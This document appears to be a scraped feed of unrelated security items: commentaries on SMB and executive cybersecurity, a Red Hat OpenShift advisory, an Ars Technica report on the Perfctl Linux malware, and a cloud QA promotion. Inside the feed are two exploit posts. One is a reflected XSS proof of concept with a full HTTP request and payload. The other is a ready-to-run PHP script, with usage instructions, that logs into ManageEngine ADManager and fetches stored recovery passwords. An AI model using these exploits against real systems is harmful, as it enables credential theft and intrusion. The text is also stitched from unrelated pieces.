​​​With careful planning, ongoing evaluation, and a commitment to treat cybersecurity as a core business function, SMBs can transform their vulnerabilities into strengths​​.

Source: Josie Elias via Alamy Stock Photo

COMMENTARY

Small and medium-sized businesses (SMBs) increasingly have become prime targets for cybercriminals. While large corporations often dominate headlines when breaches occur, the reality is that SMBs are at even greater risk. Almost 70% of SMBs reported experiencing at least one cyberattack in the past year. The reasons are clear: SMBs often operate with limited budgets, inadequate cybersecurity tools, and a shortage of skilled cybersecurity professionals. These factors make them particularly vulnerable to the sophisticated and evolving threats of today's cyber environment.  

SMBs are the lifeblood of our economy, and their drive and determination are truly inspiring. The businesses I interact with are exceptionally skilled and consistently deliver outstanding services and products to their customers. I must remind myself, however, that SMBs are not inherently technology companies. Because of budget challenges, they are often considered "soft targets" by threat actors.  

These smaller businesses just want their IT to work seamlessly and securely. Yet, when it comes to mitigating threats like cyber breaches, they are at a disadvantage. While many SMBs understand the importance of cybersecurity, they often need help prioritizing, implementing, and maintaining effective defenses due to limited resources — both financial and technical — compared with larger organizations.  

**Understanding the Landscape **

The range of cyber threats facing SMBs is broad and constantly evolving. Common attack vectors include phishing, ransomware, denial of service, social engineering, and session hijacking, to name a few. Each threat can cause significant harm — whether through intellectual property theft, financial extortion, or reputational damage.  

The most successful cyberattacks exploit the gaps in an organization's cyber-risk strategy. For SMBs, these gaps frequently are the result of constrained resources, limited access to skilled talent, and a reactive approach to cybersecurity. In my conversations with customers and business partners, it's clear that while the concern for cyber-risk is universal, SMBs are often the least equipped to address these risks independently.  

**People, Process, and Technology: A Comprehensive Approach **

To effectively address cyber threats, SMBs must adopt a holistic approach that focuses on three essential components: people, process, and technology.  

**1\. People: Bridging the Skills Gap **

One of the most significant challenges SMBs face is the lack of skilled cybersecurity professionals. Even the best technology and processes can fall short without the right talent. SMBs must assess their current workforce's skills and identify gaps. Addressing these gaps is crucial, whether through training existing employees, hiring new talent, or partnering with external cybersecurity firms.  

In many cases, it may be more practical for SMBs to engage with a trusted partner to supplement their in-house capabilities. Many of the customers I speak with utilize cybersecurity-focused consultancies for short- and mid-term implementations, or rely on managed service providers (MSPs). Additionally, leveraging software-as-a-service (SaaS) solutions can be a cost-effective way to access advanced security tools without requiring extensive in-house expertise. These services often have guaranteed service levels, ensuring that experienced professionals manage critical security functions.  

**2\. Process: Defining Cyber Resilience **

While each organization has unique technical requirements, the need for a well-defined cyber-resilience strategy is universal. SMBs must develop processes tailored to their specific needs and adapt to changing business demands. A one-size-fits-all approach will not suffice. Instead, SMBs should consider standard frameworks like ITIL, Agile, and DevOps as baselines for developing their cybersecurity strategies, as these frameworks can help streamline processes and strengthen the overall cybersecurity posture.  

A key takeaway from my conversations with successful SMBs is the importance of designing sustainable business processes. Cyber resilience is an ongoing journey, not a static goal requiring continuous improvement and adaptability. Every organization must regularly evaluate and update processes to keep pace with evolving needs and emerging threats. By embracing a dynamic approach to process development, SMBs can stay ahead of the curve and maintain robust defenses.  

**3\. Technology: Choosing the Right Tools **

Technology is the cornerstone of any cybersecurity strategy. Given the wide range of available tools, SMBs must carefully select the solutions that best meet their specific needs. Whether focusing on network security, data protection, or identity management, the chosen technology must be both practical and scalable.  

SMBs should focus on ensuring their technology stack aligns with their cybersecurity strategy. This means evaluating on-premises and cloud-based solutions while carefully managing access to sensitive data. The objective is to choose technology that not only addresses immediate security concerns but also strengthens long-term resilience.  

**Engaging Leadership and Industry **

A critical aspect of any successful cybersecurity program is the involvement of leadership at every level of the organization. From my discussions with business leaders who have established robust cyber resilience programs, one common theme emerges: Cybersecurity is a serious priority across the organization. It's not merely the IT department's responsibility but a critical business imperative that affects reputation, financial health, and legal compliance.  

To secure this level of commitment, SMBs must involve their leadership teams in developing and overseeing cybersecurity strategies. This entails conducting regular assessments of the program's effectiveness, incorporating feedback from both cybersecurity professionals and business leaders. When leadership is actively involved, it sends a clear message that cybersecurity is a priority, fostering a culture of security throughout the organization.  

Another critical factor is the willingness to seek external expertise. Successful SMBs often look beyond their internal resources, utilizing market analysis, user groups, vendor forums, and industry contacts to inform their cybersecurity strategies. For SMBs with limited staff and experience, these external resources offer valuable insights and support critical to the success of their programs. 

**Conclusion: A Proactive Path Forward **

Cybersecurity is not a one-time effort — it's an ongoing commitment that requires vigilance, adaptability, and strategic investment. For SMBs, the path to cyber resilience may be challenging, but it is achievable with the right approach. By focusing on the critical areas of people, processes, and technology, and engaging leadership at all levels, SMBs can develop robust defenses that safeguard their assets, reputation, and future growth.  

Ultimately, it's not just about preventing attacks. It’s about building a resilient organization that can thrive in an increasingly digital and complex business environment. As threats evolve, SMBs must continuously adapt their strategies and solutions to protect their businesses. Through careful planning, ongoing evaluation, and a commitment to treat cybersecurity as a core business function, SMBs can transform their vulnerabilities into strengths and secure their place in the digital economy.  

**About the Author**

CEO, One Identity

Mark Logan serves as Chief Executive Officer of One Identity and joined the company in June 2022. He is responsible for driving the overall growth strategy, go-to-market and P&L for One Identity. Mark is a seasoned executive with experience developing enterprise software companies to achieve successful growth. He is a proven leader with nearly two decades of C-suite experience at companies such as Emptoris (now part of IBM), Attunity, and most recently LogRhythm. Having been in the cyber security space for several years, Mark believes One Identity is in the right market at the right time to provide critically important cybersecurity protection for enterprises, public sector organizations and federal agencies.

Building Cyber Resilience in SMBs ​With ​Limited Resources

Red Hat Security Advisory 2024-7599-03 - Red Hat OpenShift Container Platform release 4.16.16 is now available with updates to packages and images that fix several bugs and add enhancements. Issues addressed include code execution, denial of service, integer overflow, and out of bounds write vulnerabilities.

The following advisory data is extracted from:

https://security.access.redhat.com/data/csaf/v2/advisories/2024/rhsa-2024_7599.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Important: OpenShift Container Platform 4.16.16 bug fix and security update  
Advisory ID:        RHSA-2024:7599-03  
Product:            Red Hat OpenShift Enterprise  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:7599  
Issue date:         2024-10-09  
Revision:           03  
CVE Names:          CVE-2023-3462  
====================================================================

Summary: 

Red Hat OpenShift Container Platform release 4.16.16 is now available with updates to packages and images that fix several bugs and add enhancements.

This release includes a security update for Red Hat OpenShift Container Platform 4.16.

Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

Red Hat OpenShift Container Platform is Red Hat's cloud computing Kubernetes application platform solution designed for on-premise or private cloud deployments.

This advisory contains the container images for Red Hat OpenShift Container Platform 4.16.16. See the following advisory for the RPM packages for this release:

https://access.redhat.com/errata/RHBA-2024:7602

Space precludes documenting all of the container images in this advisory. See the following Release Notes documentation, which will be updated shortly for this release, for details about these changes:

https://docs.openshift.com/container-platform/4.16/release_notes/ocp-4-16-release-notes.html

Security Fix(es):

* glibc: Out of bounds write in iconv may lead to remote code execution  
(CVE-2024-2961)  
* Hashicorp/vault: Vault’s LDAP Auth Method Allows for User Enumeration  
(CVE-2023-3462)  
* openssl: Possible denial of service in X.509 name checks (CVE-2024-6119)  
* path-to-regexp: Backtracking regular expressions cause ReDoS  
(CVE-2024-45296)  
* libexpat: Negative Length Parsing Vulnerability in libexpat  
(CVE-2024-45490)  
* libexpat: Integer Overflow or Wraparound (CVE-2024-45491)  
* libexpat: integer overflow (CVE-2024-45492)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

All OpenShift Container Platform 4.16 users are advised to upgrade to these updated packages and images when they are available in the appropriate release channel. To check for available updates, use the OpenShift CLI (oc) or web console. Instructions for upgrading a cluster are available at https://docs.openshift.com/container-platform/4.16/updating/updating_a_cluster/updating-cluster-cli.html

Solution:

CVEs:

CVE-2023-3462

References:

https://access.redhat.com/security/updates/classification/#important  
https://bugzilla.redhat.com/show_bug.cgi?id=2228020  
https://bugzilla.redhat.com/show_bug.cgi?id=2273404  
https://bugzilla.redhat.com/show_bug.cgi?id=2306158  
https://bugzilla.redhat.com/show_bug.cgi?id=2308615  
https://bugzilla.redhat.com/show_bug.cgi?id=2308616  
https://bugzilla.redhat.com/show_bug.cgi?id=2308617  
https://bugzilla.redhat.com/show_bug.cgi?id=2310908  
https://issues.redhat.com/browse/OCPBUGS-31878  
https://issues.redhat.com/browse/OCPBUGS-35850  
https://issues.redhat.com/browse/OCPBUGS-36816  
https://issues.redhat.com/browse/OCPBUGS-37654  
https://issues.redhat.com/browse/OCPBUGS-37689  
https://issues.redhat.com/browse/OCPBUGS-38687  
https://issues.redhat.com/browse/OCPBUGS-38797  
https://issues.redhat.com/browse/OCPBUGS-39377  
https://issues.redhat.com/browse/OCPBUGS-41709  
https://issues.redhat.com/browse/OCPBUGS-41905  
https://issues.redhat.com/browse/OCPBUGS-42012  
https://issues.redhat.com/browse/OCPBUGS-42015  
https://issues.redhat.com/browse/OCPBUGS-42057  
https://issues.redhat.com/browse/OCPBUGS-42113  
https://issues.redhat.com/browse/OCPBUGS-42382

Red Hat Security Advisory 2024-7599-03

Company leadership needs to ensure technology teams are managing continuous monitoring, automated testing, and alignment with business needs across their enterprise.

Source: Stu Gray via Alamy Stock Photo

COMMENTARY

This summer, a cyberattack disrupted the normal operations of thousands of auto dealerships across the United States, affecting everything from records to scheduling, causing no end to annoyances and leaving hordes of exasperated salespeople and customers at their wits' end.

The most recent and dramatic example of hacker success illustrates that IT security must become the first priority at the highest levels of an organization. This modern-day plague shows no sign of subsiding. With each successful attack, hackers become even more emboldened. 

It's an all-out assault, requiring the corporate equivalent of an all-points bulletin. In short, cybersecurity is not just an IT issue; it's a critical business risk that requires active involvement from the entire C-suite, in particular, the CEO. This is one area of the enterprise that may benefit from micromanagement in an effort to display the importance of the pursuit.

My colleagues and I regularly advise our clients that they should be asking three questions of their team: What are we doing? Is it enough? How do we know?

Effective cybersecurity requires the right balance of spending and technology value, continuous assessment, and the adoption of advanced technologies such as automation and artificial intelligence. Few regret wise investments in cybersecurity defenses.

The increasing frequency and sophistication of cyberattacks underscore the seriousness for executive-level engagement in cybersecurity. Recent incidents, such as the SEC's $10 million fine on the New York Stock Exchange's parent company and the notorious SolarWinds action, illustrate the severe impact on business operations and regulatory compliance. These events highlight the necessity for CEOs to recognize their critical role in cybersecurity. 

Ascension Healthcare's ransomware attack, among other prime examples, serves as an object lesson in the urgency of the matter, especially in healthcare. Doctors and pharmacies struggled with order and prescription issues, leading to lost revenue as patients sought services elsewhere, and virtually bringing the massive hospital system to its figurative knees, causing tremendous frustration among staff and patients. This situation underscored the need for technologists to understand business operations and implement security measures that support the business. 

CEOs must understand that cybersecurity is central to their management duties and not just "tech stuff" to be delegated. They need to receive business-outcome-focused reporting with the same level of rigor as financial and safety reporting. This reporting should answer the above three questions using system-generated metrics and integrate results into business decisions to stay ahead of the increasingly destructive capabilities of adversaries conspiring to do them harm.

CEOs set the organizational tone and ultimately are responsible for cybersecurity. Their endorsement of security measures can drive home their importance, ensure alignment with business goals across the senior leadership team, and communicate capabilities to their boards. The following steps are essential for CEOs to prioritize cybersecurity:

*   Engage in cybersecurity planning and response: CEOs and executive leaders must be actively involved in cybersecurity planning and response. Their endorsement and understanding of cybersecurity's importance can fuel organizational commitment and set the right tone. Deciding how to handle hypothetical ransom, extortion, and fraud events accelerates response when an event occurs.
    

*   Conduct business analysis for cyber spending: Utilize business analysis to determine the appropriate cybersecurity investments. Focus on preventive technologies that provide greater risk reduction and ensure that the spending aligns with business priorities.
    

*   Implement multifactor authentication: Ensure that multifactor authentication is in place and effective. Avoid inferior solutions that users can mindlessly click through, and prioritize strong authentication measures for password resets to enhance security.
    

*   Regularly review and assess cybersecurity measures: Frequently review assessment results and address important gaps. This includes adopting automation for continuous threat exposure management and ensuring cybersecurity is integrated into business operations.
    

*   Adopt advanced technologies and continuous testing: Embrace automation and advanced technologies for security testing and closing security gaps. Stay ahead of emerging threats by keeping up with advancements in AI and other technologies.
    

*   Seek independent advice and expertise: Business leaders will be called to answer for hiring well-qualified cybersecurity advisers and executives. Use the three questions to understand the current state of cybersecurity within the organization. Seek independent advice to keep up with current threats and defenses. Obtain board members' cybersecurity expertise combined with other essential business skills, or hire independent advisers to provide valuable insights.
    

What hasn't played out yet is the full impact of increased AI usage by both attackers and defenders. As AI technology advances, organizations must keep up to ensure their cybersecurity measures are effective. A recent survey of IT security officers revealed that increasing use of AI will lead to more security breaches, while, conversely, four in five intend to use AI to guard against those same breaches. The ongoing complexity and expanding surface area of systems likely will lead to an increase in cyberattacks through 2030. This necessitates continuous vigilance, adoption of automation for threat and vulnerability management, and regular reviews of cybersecurity measures. Companies will also have to understand and protect against new AI-enabled systems that they are developing. 

Cyber-risk is inherently a business risk, and effective cybersecurity measures are essential for protecting valuable information and maintaining system availability.

One might argue that cybersecurity can be managed solely by IT departments. However, without executive-level involvement, organizations may face significant business disruptions and regulatory penalties. CEOs must understand their role in cybersecurity to ensure comprehensive protection.

The consistent pattern of cyber incidents causing business disruptions and regulatory fines supports the conclusion that CEO involvement is crucial to ensure that companies can answer the three questions: What are we doing? Is it enough? How do we know? Determining business value at risk and the right amount of protection requires business input. As company leadership, now is the time to ensure that technology teams are managing continuous monitoring, automated testing, and alignment with business needs across the enterprise.

**About the Author**

Managing Director, BPM

Ken Frantz is a transformational IT leader and consultant with experience in global financial services, emerging technology, and top-tier health system networks. He focuses on innovative technology advancement with reduced risk and is interested in high impact/high value opportunities to improve IT operations, deliver value, and help companies grow efficiently and effectively.

Your IT Systems Are Being Attacked. Are You Prepared?

Perfctl malware is hard to detect, persists after reboots, and can perform a breadth of malicious activities.

Thousands of machines running Linux have been infected by a malware strain that’s notable for its stealth, the number of misconfigurations it can exploit, and the breadth of malicious activities it can perform, researchers reported Thursday.

The malware has been circulating since at least 2021. It gets installed by exploiting more than 20,000 common misconfigurations, a capability that may make millions of machines connected to the internet potential targets, researchers from Aqua Security said. It can also exploit CVE-2023-33426, a vulnerability with a severity rating of 10 out of 10 that was patched last year in Apache RocketMQ, a messaging and streaming platform that’s found on many Linux machines.

****Perfctl Storm****

The researchers are calling the malware Perfctl, the name of a malicious component that surreptitiously mines cryptocurrency. The unknown developers of the malware gave the process a name that combines the perf Linux monitoring tool and ctl, an abbreviation commonly used with command line tools. A signature characteristic of Perfctl is its use of process and file names that are identical or similar to those commonly found in Linux environments. The naming convention is one of the many ways the malware attempts to escape notice of infected users.

Perfctl further cloaks itself using a host of other tricks. One is that it installs many of its components as rootkits, a special class of malware that hides its presence from the operating system and administrative tools. Other stealth mechanisms include:

*   Stopping activities that are easy to detect when a new user logs in
*   Using a Unix socket over TOR for external communications
*   Deleting its installation binary after execution and running as a background service thereafter
*   Manipulating the Linux process pcap\_loop through a technique known as hooking to prevent admin tools from recording the malicious traffic
*   Suppressing mesg errors to avoid any visible warnings during execution.

The malware is designed to ensure persistence, meaning the ability to remain on the infected machine after reboots or attempts to delete core components. Two such techniques are (1) modifying the ~/.profile script, which sets up the environment during user login so the malware loads ahead of legitimate workloads expected to run on the server and (2) copying itself from memory to multiple disk locations. The hooking of pcap\_loop can also provide persistence by allowing malicious activities to continue even after primary payloads are detected and removed.

Besides using the machine resources to mine cryptocurrency, Perfctl also turns the machine into a profit-making proxy that paying customers use to relay their internet traffic. Aqua Security researchers have also observed the malware serving as a backdoor to install other families of malware.

Assaf Morag, Aqua Security’s threat intelligence director, wrote in an email:

> Perfctl malware stands out as a significant threat due to its design, which enables it to evade detection while maintaining persistence on infected systems. This combination poses a challenge for defenders and indeed the malware has been linked to a growing number of reports and discussions across various forums, highlighting the distress and frustration of users who find themselves infected.
> 
> Perfctl uses a rootkit and changes some of the system utilities to hide the activity of the cryptominer and proxy-jacking software. It blends seamlessly into its environment with seemingly legitimate names. Additionally, Perfctl’s architecture enables it to perform a range of malicious activities, from data exfiltration to the deployment of additional payloads. Its versatility means that it can be leveraged for various malicious purposes, making it particularly dangerous for organizations and individuals alike.

****“The Malware Always Manages to Restart”****

While Perfctl and some of the malware it installs are detected by some antivirus software, Aqua Security researchers were unable to find any research reports on the malware. They were, however, able to find a wealth of threads on developer-related sites that discussed infections consistent with it.

This Reddit comment posted to the CentOS subreddit is typical. An admin noticed that two servers were infected with a cryptocurrency hijacker with the names perfcc and perfctl. The admin wanted help investigating the cause.

“I only became aware of the malware because my monitoring setup alerted me to 100% CPU utilization,” the admin wrote in the April 2023 post. “However, the process would stop immediately when I logged in via SSH or console. As soon as I logged out, the malware would resume running within a few seconds or minutes.” The admin continued:

> I have attempted to remove the malware by following the steps outlined in other forums, but to no avail. The malware always manages to restart once I log out. I have also searched the entire system for the string "perfcc" and found the files listed below. However, removing them did not resolve the issue. as it keep respawn on each time rebooted.

Other discussions include: Reddit, Stack Overflow (Spanish), forobeta (Spanish), brainycp (Russian), natnetwork (Indonesian), Proxmox (Deutsch), Camel2243 (Chinese), svrforum (Korean), exabytes, virtualmin, serverfault and many others.

After exploiting a vulnerability or misconfiguration, the exploit code downloads the main payload from a server, which, in most cases, has been hacked by the attacker and converted into a channel for distributing the malware anonymously. An attack that targeted the researchers’ honeypot named the payload httpd. Once executed, the file copies itself from memory to a new location in the /temp directory, runs it, and then terminates the original process and deletes the downloaded binary.

Once moved to the /tmp directory, the file executes under a different name, which mimics the name of a known Linux process. The file hosted on the honeypot was named sh. From there, the file establishes a local command-and-control process and attempts to gain root system rights by exploiting CVE-2021-4043, a privilege-escalation vulnerability that was patched in 2021 in Gpac, a widely used open source multimedia framework.

The malware goes on to copy itself from memory to a handful of other disk locations, once again using names that appear as routine system files. The malware then drops a rootkit, a host of popular Linux utilities that have been modified to serve as rootkits, and the miner. In some cases, the malware also installs software for “proxy-jacking,” the term for surreptitiously routing traffic through the infected machine so the true origin of the data isn’t revealed.

The researchers continued:

> As part of its command-and-control operation, the malware opens a Unix socket, creates two directories under the /tmp directory, and stores data there that influences its operation. This data includes host events, locations of the copies of itself, process names, communication logs, tokens, and additional log information. Additionally, the malware uses environment variables to store data that further affects its execution and behavior.
> 
> All the binaries are packed, stripped, and encrypted, indicating significant efforts to bypass defense mechanisms and hinder reverse engineering attempts. The malware also uses advanced evasion techniques, such as suspending its activity when it detects a new user in the btmp or utmp files and terminating any competing malware to maintain control over the infected system.

By extrapolating data such as the number of Linux servers connected to the internet across various services and applications, as tracked by services such as Shodan and Censys, the researchers estimate that the number of machines infected by Perfctl is measured in the thousands. They say that the pool of vulnerable machines—meaning those that have yet to install the patch for CVE-2023-33426 or contain a vulnerable misconfiguration—is in the millions. The researchers have yet to measure the amount of cryptocurrency the malicious miners have generated.

People who want to determine if their device has been targeted or infected by Perfctl should look for indicators of compromise included in Thursday’s post. They should also be on the lookout for unusual spikes in CPU usage or sudden system slowdowns, particularly if they occur during idle times. Thursday’s report also provides steps for preventing infections in the first place.

_This story originally appeared on_ _Ars Technica._

Stealthy Malware Has Infected Thousands of Linux Systems for Years

Computer Laboratory Management System 2024 version 1.0 suffers from a cross site scripting vulnerability.

    ## Titles: LMS2024-1.0 XSS-Reflected Information Disclosure## Author: nu11secur1ty## Date: 00/04/2024## Vendor: https://github.com/oretnom23## Software:https://www.sourcecodester.com/php/17268/computer-laboratory-management-system-using-php-and-mysql.html#google_vignette## Reference: https://portswigger.net/web-security/cross-site-scripting## Description:The value of the username request parameter is copied into the HTMLdocument as plain text between tags. The payload ro2iz<img src=aonerror=alert(1)>xggkt was submitted in the username parameter. This inputwas echoed unmodified in the application's response.STATUS: HIGH- Vulnerability[+]Exploits:- XSS-Reflected:```xssPOST /php-lms/classes/Login.php?f=login HTTP/1.1Host: pwnedhost.comAccept-Encoding: gzip, deflate, brAccept: */*Accept-Language: en-US;q=0.9,en;q=0.8User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36(KHTML, like Gecko) Chrome/128.0.6613.138 Safari/537.36Connection: closeCache-Control: max-age=0Cookie: PHPSESSID=g61goafu1miq2e737ra7dclqmlOrigin: https://pwnedhost.comX-Requested-With: XMLHttpRequestReferer: https://pwnedhost.com/php-lms/admin/login.phpContent-Type: application/x-www-form-urlencoded; charset=UTF-8Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="128","Chromium";v="128"Sec-CH-UA-Platform: WindowsSec-CH-UA-Mobile: ?0Content-Length: 37username=VLVAuyqjro2iz%3cimg%20src%3da%20onerror%3dalert(1)%3exggkt&password=e3I!x1c!Q7```+ [Response]```HTTP/1.1 200 OKDate: Fri, 04 Oct 2024 08:27:39 GMTServer: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.2.4X-Powered-By: PHP/8.2.4Expires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidatePragma: no-cacheAccess-Control-Allow-Origin: *Content-Length: 177Connection: closeContent-Type: text/html; charset=UTF-8{"status":"incorrect","last_qry":"SELECT * from users where username ='VLVAuyqjro2iz<img src=a onerror=alert(1)>xggkt' and password =md5('45ec487cfe5b3bac8e61740ae8dbcd06') "}```## Reproduce:[href](https://www.patreon.com/nu11secur1ty)## Demo PoC:[href](https://www.patreon.com/nu11secur1ty)## Time spent:00:27:00-- System Administrator - Infrastructure EngineerPenetration Testing EngineerExploit developer at https://packetstormsecurity.com/https://cve.mitre.org/index.htmlhttps://cxsecurity.com/ and https://www.exploit-db.com/0day Exploit DataBase https://0day.today/home page: https://www.nu11secur1ty.com/hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=                          nu11secur1ty <http://nu11secur1ty.com/>-- System Administrator - Infrastructure EngineerPenetration Testing EngineerExploit developer at https://packetstormsecurity.com/https://cve.mitre.org/index.htmlhttps://cxsecurity.com/ and https://www.exploit-db.com/0day Exploit DataBase https://0day.today/home page: https://www.nu11secur1ty.com/hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=                          nu11secur1ty <http://nu11secur1ty.com/>

Computer Laboratory Management System 2024 1.0 Cross Site Scripting

ManageEngine ADManager version 7183 suffers from a password hash disclosure vulnerability.

    =============================================================================================================================================| # Title     : ManageEngine ADManager 7183 Password Hash Disclosure Vulnerability                                                          || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.2 (64 bits)                                                            || # Vendor    : https://www.manageengine.com/products/ad-manager/                                                                           |=============================================================================================================================================POC :[+] Dorking İn Google Or Other Search Enggine.[+] ManageEngine ADManager Plus versions prior to build 7183 suffers from a  Password Hash disclosure vulnerability..[+] save code as poc.php .[+] USage : php poc.php -t <target_url> -a <auth> -u <username> -p <password>[+] PayLoad :<?php// تعطيل تحذيرات HTTPSerror_reporting(0);function getPass($target, $auth, $user, $password) {    // تهيئة Session    $ch = curl_init();        // تحويل نوع المصادقة إذا كان ADManager    if (strtolower($auth) == 'admanager') {        $auth = 'ADManager Plus Authentication';    }        // بيانات تسجيل الدخول    $data = http_build_query([        "is_admp_pass_encrypted" => "false",        "j_username" => $user,        "j_password" => $password,        "domainName" => $auth,        "AUTHRULE_NAME" => "ADAuthenticator"    ]);        // إعدادات الطلب    $url = $target . 'j_security_check?LogoutFromSSO=true';    curl_setopt($ch, CURLOPT_URL, $url);    curl_setopt($ch, CURLOPT_POST, true);    curl_setopt($ch, CURLOPT_POSTFIELDS, $data);    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);    curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);    curl_setopt($ch, CURLOPT_HTTPHEADER, [        "User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0",        "Content-Type: application/x-www-form-urlencoded"    ]);    // إرسال الطلب    $response = curl_exec($ch);        // التحقق من المصادقة    $http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);    if (strpos($response, 'Cookie') !== false) {        echo "[+] Authentication successful!\n";    } elseif ($http_code == 200) {        echo "[-] Invalid login name/password!\n";        exit(0);    } else {        echo "[-] Something went wrong!\n";        exit(1);    }    // استرجاع كلمة المرور    for ($i = 1; $i <= 5; $i++) {        echo "[*] Trying to fetch recovery password for domainId: $i!\n";        $passUrl = $target . 'ConfigureRecoverySettings/GET_PASS?req=%7B%22domainId%22%3A%22' . $i . '%22%7D';        curl_setopt($ch, CURLOPT_URL, $passUrl);        curl_setopt($ch, CURLOPT_POST, false);        $passResponse = curl_exec($ch);                if ($passResponse) {            echo $passResponse . "\n";        }    }    curl_close($ch);}function get_args() {    global $argv;    $args = [        'target' => '',        'auth' => '',        'user' => '',        'password' => ''    ];    for ($i = 1; $i < count($argv); $i++) {        switch ($argv[$i]) {            case '-t':            case '--target':                $args['target'] = $argv[++$i];                break;            case '-a':            case '--auth':                $args['auth'] = $argv[++$i];                break;            case '-u':            case '--user':                $args['user'] = $argv[++$i];                break;            case '-p':            case '--password':                $args['password'] = $argv[++$i];                break;        }    }    return $args;}function main() {    $args = get_args();    if (!$args['target'] || !$args['auth'] || !$args['user'] || !$args['password']) {        echo "Usage: php exploit.php -t <target_url> -a <auth> -u <username> -p <password>\n";        exit(1);    }    getPass($args['target'], $args['auth'], $args['user'], $args['password']);}main();?>Greetings to :=====================================================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|===================================================================================================

ManageEngine ADManager 7183 Password Hash Disclosure

Cloud-based solutions are transforming the software quality assurance (QA) industry. As organizations increasingly migrate their development and verification…

Cloud-based solutions are transforming the software quality assurance (QA) industry. As organizations increasingly migrate their development and verification processes to the cloud, QA teams gain access to unprecedented scalability, flexibility, and efficiency. This shift is enabling teams to optimize their workflows, better handle growing demands, and respond more swiftly to project needs.

Companies can now accelerate their evaluation cycles, enhance collaboration, and reduce costs, all while leveraging the latest technological advancements. Cloud-based platforms offer a unified environment where QA professionals, developers, and managers can work together seamlessly, regardless of their physical location. This transformation is rapidly becoming a cornerstone of modern software development.

According to AI-powered QA management tool and service provider Aqua Cloud, addressing key pain points in the software validation process requires thorough diligence. Therefore, teams must focus on higher-value activities by simplifying repetitive processes using Aqua Cloud’s AI-powered capabilities and automation tools.

Centralizing quality management in a single ecosystem helps to remove silos and guarantees seamless processes, hence greatly lowering the inefficiencies often afflicting dispersed QA systems.

****The Scalability and Flexibility of Cloud-Based Quality Assurance****

One of the primary advantages of cloud-based solutions is the ability to scale QA environments quickly and efficiently. Traditional on-premise infrastructure requires significant investment in hardware and maintenance, which limits the capacity to scale as demand increases. 

In contrast, cloud-based platforms allow QA teams to scale up or down depending on their current needs, whether they handle small-scale projects or manage enterprise-level applications. This scalability improves resource allocation and reduces the time needed to set up validation environments.

Additionally, cloud-based platforms provide unmatched flexibility. Teams can access QA environments from anywhere, facilitating global collaboration. As remote work becomes more common, the cloud’s accessibility ensures that quality assurance professionals and developers can work together without geographic constraints. This collaborative environment fosters better communication and faster resolution of issues, helping to meet tight development deadlines.

****Cost Efficiency Through Pay-as-You-Go Models****

Cost savings are a critical factor driving the adoption of cloud-based QA solutions. Traditional quality assurance infrastructures require substantial upfront capital investment in hardware, licenses, and ongoing maintenance. Cloud-based platforms, on the other hand, operate on a pay-as-you-go model, meaning that organizations only pay for the resources they use. This allows businesses to optimize their budgets, especially when workloads fluctuate.

The cloud also eliminates the need for dedicated physical infrastructure, reducing not only hardware costs but also associated overheads like energy consumption and IT staff for maintenance. The savings can be redirected toward improving other areas of software development and quality assurance, such as hiring additional QA specialists or investing in advanced tools.

****Enhanced Cooperation and Automation****

In today’s fast-paced software development lifecycle (SDLC), collaboration is essential to delivering high-quality software products. Cloud-based platforms enhance collaboration by providing a centralized repository where all team members can access QA data in real-time. This transparency ensures that everyone — from quality managers to QA professionals and developers — clearly understands the progress and can act swiftly to resolve issues.

Automation is another significant benefit offered by cloud-based solutions. Automated tools integrated within these platforms reduce the need for manual intervention, allowing QA teams to run extensive validation cases without delays. This is particularly useful for repetitive tasks like regression checks, where automation can dramatically cut down the time required for execution. As a result, QA teams can shift their focus to more critical aspects of the process, such as exploratory assessments or improving coverage.

****Improved Security and Compliance****

Security is a primary concern for businesses, particularly those in regulated industries such as healthcare and finance. Cloud-based solutions have evolved to offer strong security features that ensure data integrity and confidentiality. Leading cloud service providers often offer advanced encryption, multi-factor authentication, and compliance with international security standards.

Moreover, cloud-based QA platforms help organizations meet regulatory requirements by providing audit-ready documentation and traceability. Every action within the quality assurance process is logged, ensuring that companies can prove compliance during audits. This feature is invaluable for industries requiring strict data handling and security protocols.

****Integration with Existing Tools****

Another major advantage of cloud-based solutions is their ability to integrate seamlessly with existing tools and frameworks used in the software development lifecycle. Many QA teams rely on a mix of open-source and proprietary tools, which can be difficult to synchronize when operating on traditional infrastructures. Cloud platforms simplify this process by offering pre-built integrations with popular tools like Jira, Jenkins, and Azure DevOps.

This interoperability reduces the complexity of managing multiple systems and eliminates data silos. When all tools are connected within the cloud ecosystem, it becomes easier for teams to share information, monitor performance, and ensure that the entire software development process runs smoothly.

Cloud-based solutions are transforming the infrastructure of software quality assurance, offering unmatched scalability, flexibility, and cost-efficiency. As businesses continue to embrace digital transformation, cloud-based QA solutions will play an increasingly vital role in ensuring the success of software development projects, eliminating inefficiencies, and taking away the pains that have traditionally been associated with the quality assurance process.

1.  Best Practices for Cloud Computing Security
2.  How To Safeguard Your Data With Cloud MRP System
3.  The Role of DevOps in Streamlining Cloud Migration Processes
